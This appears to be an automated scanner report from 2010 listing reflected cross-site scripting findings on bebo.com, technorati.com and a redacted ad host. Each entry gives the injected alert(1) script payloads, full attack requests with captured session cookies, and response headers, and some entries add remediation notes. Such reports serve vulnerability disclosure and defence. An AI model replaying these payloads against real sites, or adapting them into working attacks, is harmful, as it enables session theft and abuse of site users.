The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb41d"><img%20src%3da%20onerror%3dalert(1)>86ea3df0102 was submitted in the REST URL parameter 2. This input was echoed as fb41d"><img src=a onerror=alert(1)>86ea3df0102 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /c/sitefb41d"><img%20src%3da%20onerror%3dalert(1)>86ea3df0102/regframe_script.js HTTP/1.1 Host: s.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Content-Language: fr-FR Content-Type: text/html; charset=UTF-8 Date: Mon, 15 Nov 2010 22:43:38 GMT Content-Length: 9267 Connection: close Cache-Control: max-age=600
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6a438<img%20src%3da%20onerror%3dalert(1)>92cf382f499 was submitted in the REST URL parameter 3. This input was echoed as 6a438<img src=a onerror=alert(1)>92cf382f499 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /c/site/regframe_script.js6a438<img%20src%3da%20onerror%3dalert(1)>92cf382f499 HTTP/1.1 Host: s.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Content-Language: es-ES Content-Type: text/html; charset=UTF-8 Date: Mon, 15 Nov 2010 22:43:45 GMT Content-Length: 8883 Connection: close Cache-Control: no-cache Pragma: No-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73a19'%3b63e7572dbb was submitted in the REST URL parameter 3. This input was echoed as 73a19';63e7572dbb in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/site/regframe_script.js73a19'%3b63e7572dbb HTTP/1.1 Host: s.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Content-Language: es-ES Content-Type: text/html; charset=UTF-8 Date: Mon, 15 Nov 2010 22:43:42 GMT Content-Length: 8631 Connection: close Cache-Control: no-cache Pragma: No-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8b456'><script>alert(1)</script>0ee57a63d45 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c/site/regframe_script.js8b456'><script>alert(1)</script>0ee57a63d45 HTTP/1.1 Host: s.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Content-Language: es-ES Content-Type: text/html; charset=UTF-8 Date: Mon, 15 Nov 2010 22:43:42 GMT Content-Length: 8808 Connection: close Cache-Control: no-cache Pragma: No-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80bfb"><img%20src%3da%20onerror%3dalert(1)>8510a9b412b was submitted in the REST URL parameter 3. This input was echoed as 80bfb"><img src=a onerror=alert(1)>8510a9b412b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /c/site/80bfb"><img%20src%3da%20onerror%3dalert(1)>8510a9b412b HTTP/1.1 Host: s.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Content-Language: de-DE Content-Type: text/html; charset=UTF-8 Date: Mon, 15 Nov 2010 22:43:41 GMT Content-Length: 8645 Connection: close Cache-Control: no-cache Pragma: No-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the url request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ebb9f'-alert(1)-'57d6b041cfe was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cosmos/search.html?url=ebb9f'-alert(1)-'57d6b041cfe HTTP/1.1 Host: technorati.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a47ae"><script>alert(1)</script>f3372539a5d was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /cosmos/search.html?url=a47ae"><script>alert(1)</script>f3372539a5d HTTP/1.1 Host: technorati.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a20c'%3b0344f0fcd83 was submitted in the REST URL parameter 4. This input was echoed as 5a20c';0344f0fcd83 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /MRT/iview/266655638/direct5a20c'%3b0344f0fcd83 HTTP/1.1 Host: redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AA002=1289161490-4161261; ach01=b1097a6/33f2/fc007b4/ce69/4cd70b5c:b3c8356/27054/fdc06b8/ba67/4cd71a92:b353b83/36d8/fe964b5/e2ff/4cd71b9e:ab41d2a/25f/b72466f/6d82/4cd71bff:10ecbc5/46c7/1fd2ded/e141/4cd86425:b16aca7/33f2/fc007b8/ce69/4cd8b6aa:a7af0e8/f9f/f3fefef/10401/4ce09e41; ach00=ba67/27054:e2ff/36d8:6d82/25f:e141/46c7:ce69/33f2:10401/f9f; MUID=96C2DF45871646C7B73393B23DF23548;
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 7175 Content-Type: text/html Expires: 0 Connection: close Date: Mon, 15 Nov 2010 22:44:01 GMT Connection: close
1.81. http://redcated/MRT/iview/266655638/direct [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/MRT/iview/266655638/direct
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64e46"-alert(1)-"1be0f6ce88d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
1.82. http://redcated/MRT/iview/266655638/direct [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/MRT/iview/266655638/direct
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da40c"><script>alert(1)</script>7fa15ed131f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
1.83. http://redcated/MRT/iview/266655638/direct [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/MRT/iview/266655638/direct
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f0c80'-alert(1)-'df91e654a9f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the wi.300;hi.250/01/1331029817?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9b342'-alert(1)-'707b1f3c09a was submitted in the wi.300;hi.250/01/1331029817?click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the wi.300;hi.250/01/1331029817?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d0d7</script><script>alert(1)</script>55da2c470ce was submitted in the wi.300;hi.250/01/1331029817?click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the wi.300;hi.250/01/219593849?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 896e7</script><script>alert(1)</script>6f1d8fde8cb was submitted in the wi.300;hi.250/01/219593849?click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the wi.300;hi.250/01/219593849?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b5dd'-alert(1)-'30c7ebaa98f was submitted in the wi.300;hi.250/01/219593849?click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48067'%3be278ea33c24 was submitted in the REST URL parameter 4. This input was echoed as 48067';e278ea33c24 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3bf1a</script><script>alert(1)</script>a1c71707b09 was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c03cf'-alert(1)-'354310767fc was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
1.91. http://redcated/UMD/iview/264660720/direct/01 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/UMD/iview/264660720/direct/01
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd284'-alert(1)-'18ecdee4e7b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
1.92. http://redcated/UMD/iview/264660720/direct/01 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/UMD/iview/264660720/direct/01
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19c71"-alert(1)-"863de83c9c9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
1.93. http://redcated/UMD/iview/264660720/direct/01 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/UMD/iview/264660720/direct/01
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e397c"><script>alert(1)</script>f9d62b2654f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20524'%3b1ef9abcc4d3 was submitted in the REST URL parameter 4. This input was echoed as 20524';1ef9abcc4d3 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b085e</script><script>alert(1)</script>f6b92676d58 was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c5cb5'-alert(1)-'0cbd3bd2b96 was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
1.97. http://redcated/UMD/iview/264660724/direct/01 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/UMD/iview/264660724/direct/01
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2375'-alert(1)-'99d48ad5cf3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
1.98. http://redcated/UMD/iview/264660724/direct/01 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/UMD/iview/264660724/direct/01
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a485b"-alert(1)-"8532b7710f0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
1.99. http://redcated/UMD/iview/264660724/direct/01 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/UMD/iview/264660724/direct/01
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bcddd"><script>alert(1)</script>71ac5f58114 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4e1e7'><script>alert(1)</script>55132f9b52f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Bands.jsp4e1e7'><script>alert(1)</script>55132f9b52f HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: pl-PL Content-Type: text/html; charset=UTF-8 Content-Length: 8787 Date: Mon, 15 Nov 2010 22:43:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec5d6'%3b6cf230d9add was submitted in the REST URL parameter 1. This input was echoed as ec5d6';6cf230d9add in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Bands.jspec5d6'%3b6cf230d9add HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: de-DE Content-Type: text/html; charset=UTF-8 Content-Length: 8520 Date: Mon, 15 Nov 2010 22:43:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 300ff<img%20src%3da%20onerror%3dalert(1)>20431083eda was submitted in the REST URL parameter 1. This input was echoed as 300ff<img src=a onerror=alert(1)>20431083eda in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Bands.jsp300ff<img%20src%3da%20onerror%3dalert(1)>20431083eda HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: de-DE Content-Type: text/html; charset=UTF-8 Content-Length: 8754 Date: Mon, 15 Nov 2010 22:43:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b4c9"><img%20src%3da%20onerror%3dalert(1)>e2d022ceed2 was submitted in the REST URL parameter 1. This input was echoed as 2b4c9"><img src=a onerror=alert(1)>e2d022ceed2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Bands.jsp2b4c9"><img%20src%3da%20onerror%3dalert(1)>e2d022ceed2 HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: nl-NL Content-Type: text/html; charset=UTF-8 Content-Length: 8805 Date: Mon, 15 Nov 2010 22:43:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cae26'><script>alert(1)</script>e457cd0632b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /InviteJoin.jspcae26'><script>alert(1)</script>e457cd0632b HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: nl-NL Content-Type: text/html; charset=UTF-8 Content-Length: 8759 Date: Mon, 15 Nov 2010 22:43:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
